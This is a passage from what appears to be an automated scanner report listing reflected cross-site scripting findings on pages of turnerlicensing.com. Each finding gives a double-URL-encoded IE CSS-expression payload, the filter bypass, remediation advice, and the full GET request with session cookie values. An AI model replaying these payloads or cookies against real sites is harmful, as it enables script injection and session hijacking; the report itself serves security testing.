Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.234. http://www.turnerlicensing.com/teams_by_state/Virginia [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Virginia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b052'style='x:expression(alert(1))'f30387b07b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Virginia?6b052%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527f30387b07b1=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.235. http://www.turnerlicensing.com/teams_by_state/Washington [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Washington
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fa0b'style='x:expression(alert(1))'1b3031fc933 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Washington?6fa0b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271b3031fc933=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.236. http://www.turnerlicensing.com/teams_by_state/Washington-D-C [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Washington-D-C
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9be7f'style='x:expression(alert(1))'e43a7f2732a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Washington-D-C?9be7f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e43a7f2732a=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.237. http://www.turnerlicensing.com/teams_by_state/West-Virginia [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/West-Virginia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3347'style='x:expression(alert(1))'6cb889a7789 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/West-Virginia?e3347%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276cb889a7789=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.238. http://www.turnerlicensing.com/teams_by_state/Wisconsin [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Wisconsin
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a45e'style='x:expression(alert(1))'841fffba0cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /teams_by_state/Wisconsin?9a45e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527841fffba0cf=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.239. http://www.turnerlicensing.com/teams_by_state/Wyoming [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Wyoming
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17380'style='x:expression(alert(1))'10b3c762605 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /teams_by_state/Wyoming?17380%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252710b3c762605=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.240. http://www.turnerlicensing.com/turner [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5edf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6b4ca84651 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5edf2'style='x:expression(alert(1))'d6b4ca84651 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /turner?5edf2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d6b4ca84651=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.241. http://www.turnerlicensing.com/turner_about_us [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_about_us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12db7'style='x:expression(alert(1))'560f4d45a75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /turner_about_us?12db7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527560f4d45a75=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.242. http://www.turnerlicensing.com/turner_boxed_note_cards [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_boxed_note_cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 372c9'style='x:expression(alert(1))'137ac6a221e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /turner_boxed_note_cards?372c9%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527137ac6a221e=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.243. http://www.turnerlicensing.com/turner_christmas_cards [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_christmas_cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8303b'style='x:expression(alert(1))'fa4a56a0150 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /turner_christmas_cards?8303b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fa4a56a0150=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.244. http://www.turnerlicensing.com/turner_deluxe_journals [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_deluxe_journals
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba999'style='x:expression(alert(1))'d367c03018a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /turner_deluxe_journals?ba999%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d367c03018a=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.245. http://www.turnerlicensing.com/turner_frequently_asked_questions [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_frequently_asked_questions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e4b5'style='x:expression(alert(1))'c1c6aa6bced in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /turner_frequently_asked_questions?7e4b5%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c1c6aa6bced=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.246. http://www.turnerlicensing.com/turner_mini_wall_calendars [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_mini_wall_calendars
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 511bd'style='x:expression(alert(1))'e16792023be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /turner_mini_wall_calendars?511bd%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e16792023be=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.247. http://www.turnerlicensing.com/turner_notebooks [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_notebooks
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1dc3'style='x:expression(alert(1))'ff1d101c939 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
GET /turner_notebooks?b1dc3%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ff1d101c939=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
2.248. http://www.turnerlicensing.com/turner_payment_options [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/turner_payment_options
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b6ff%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527e20c6c92743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1b6ff'style='x:expression(alert(1))'e20c6c92743 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and should HTML-encode the value for the single-quoted attribute context at the point where it is written into the response.
Request
